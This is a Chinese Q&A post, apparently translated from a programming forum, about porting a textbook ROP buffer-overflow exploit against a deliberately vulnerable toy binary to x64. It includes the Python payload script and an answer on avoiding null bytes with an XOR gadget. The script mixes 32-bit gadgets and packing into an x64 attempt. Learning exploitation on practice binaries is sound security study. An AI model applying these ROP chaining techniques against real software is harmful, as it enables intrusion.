问题描述
我目前正在尝试将简单 ROP 攻击的 this example 改编为 x64。 相应地编译程序时:
gcc -O0 -g -static -fno-stack-protector -no-pie -o simple_rop64 ./simple_rop.c
并尝试调整函数的使用地址(使用 gdb)我遇到以下问题。例如,lazy() 函数的 x64 地址在 0x401b9d,它只有三个字节。因此,struct.pack 将添加一个空字节。
python 解释器因此在执行时会抛出错误消息:
python rop_exploit.py
[...]
os.system("./simple_rop64 \"%s\"" % payload)
TypeError: system() argument 1 must be string without null bytes,not str
是否可以将这个函数地址(总是只有三个字节)用于这个易受攻击的程序?还是我必须调整它?
感谢您的帮助。
这里是我调整的python脚本
#Find gadgets
#objdump -d simple_rop64 | grep --color -E -A2 "pop +%rbp"
#47c54a: 5d pop %rbp
#47c54b: c3 retq
pop_ret = 0x47c54a # start address of a pop,ret sequence
#objdump -d simple_rop32 | grep --color -A2 8049ca4
#8049ca4: 5f pop %edi
#8049ca5: 5d pop %ebp
#8049ca6: c3 ret
pop_pop_ret = 0x8049ca4 # start address of a pop,pop,ret sequence
lazy = 0x401b9d # objdump -d | grep lazy
food = 0x401bb0 # objdump -d | grep food
feeling_sick = 0x401c0c # objdump -d | grep feeling_sick
#Buffer Overflow
#0x0000000000401d0d <+45>: lea -0x70(%rbp),%rax
payload = "A"*0x70
# Saved RBP register
payload += "BBBBBBBB"
#food(0xdeadbeef) gadget
payload += struct.pack("I",food)
payload += struct.pack("I",pop_ret)
payload += struct.pack("I",0xdeadbeef)
#feeling_sick(0xd15ea5e,0x0badf00d) gadget
payload += struct.pack("I",feeling_sick)
payload += struct.pack("I",pop_pop_ret)
payload += struct.pack("I",0xd15ea5e)
payload += struct.pack("I",0x0badf00d)
payload += struct.pack("I",lazy)
os.system("./simple_rop64 \"%s\"" % payload)
解决方法
You can't。相反,您可以做的是找到一个小工具,该小工具执行特定操作并在您的漏洞利用中执行相反的操作。
例如,如果您找到一个执行 xor eax,0xFFFFFFFF 的小工具,那么您可以将您的地址与它 (0x401b9d ^ 0xFFFFFFFF = 0xFFBFE462) 进行异或,使其适合 4 个字节。 pop 将此中间值转化为 eax 并调用您的小工具,以便您的中间值成为您想要的地址。然后你跳到它。